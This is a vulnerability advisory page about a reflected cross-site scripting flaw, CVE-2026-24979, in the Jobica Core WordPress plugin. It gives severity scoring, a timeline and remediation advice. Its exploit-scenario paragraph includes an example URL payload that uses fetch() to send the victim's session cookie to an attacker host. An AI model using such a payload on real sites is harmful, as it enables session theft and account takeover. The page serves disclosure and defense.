Skip to main content

Jobica Core EUVD-2026-15598

| CVE-2026-24979 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-03-25 Patchstack GHSA-rjxq-5wqh-3g3r
XSS Jobica Core
7.1
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
7.1 HIGH
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

4
Re-analysis Queued
Apr 24, 2026 - 16:37 vuln.today
cvss_changed
EUVD ID Assigned
Mar 25, 2026 - 16:47 euvd
EUVD-2026-15598
Analysis Generated
Mar 25, 2026 - 16:47 vuln.today
CVE Published
Mar 25, 2026 - 16:14 nvd
HIGH 7.1

DescriptionCVE.org

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NooTheme Jobica Core jobica-core allows Reflected XSS.This issue affects Jobica Core: from n/a through <= 1.4.1.

AnalysisAI

A Reflected Cross-Site Scripting (XSS) vulnerability exists in NooTheme Jobica Core plugin through version 1.4.1, allowing attackers to inject malicious scripts into web pages viewed by users. This vulnerability affects the WordPress plugin ecosystem and could enable attackers to steal session cookies, redirect users to phishing sites, or perform actions on behalf of authenticated users. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft malicious URL with XSS payload
Delivery
Attacker sends link to victim
Exploit
Victim clicks link and visits vulnerable page
Execution
Malicious script executes in victim's browser
Impact
Attacker steals session cookies or credentials
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Remote unauthenticated attacker crafts malicious URL containing unescaped input and sends it to victim. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment While a CVSS vector and score are not available, the attack vector is clearly Network-based (requires user interaction via phishing/social engineering) with low attack complexity, making this a practical threat. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a malicious URL containing injected JavaScript in a query parameter expected by the Jobica Core plugin—for example, 'https://vulnerable-site.com/?search=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>'—and distributes it via phishing email or social media. When a WordPress administrator or logged-in user clicks the link, the script executes in their browser context, exfiltrating session cookies or CSRF tokens to the attacker's server. …
Remediation Immediately upgrade NooTheme Jobica Core to a patched version above 1.4.1 as soon as a vendor security update is released and verified. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 7 days: Identify all affected systems and apply vendor patches promptly. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-15598 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy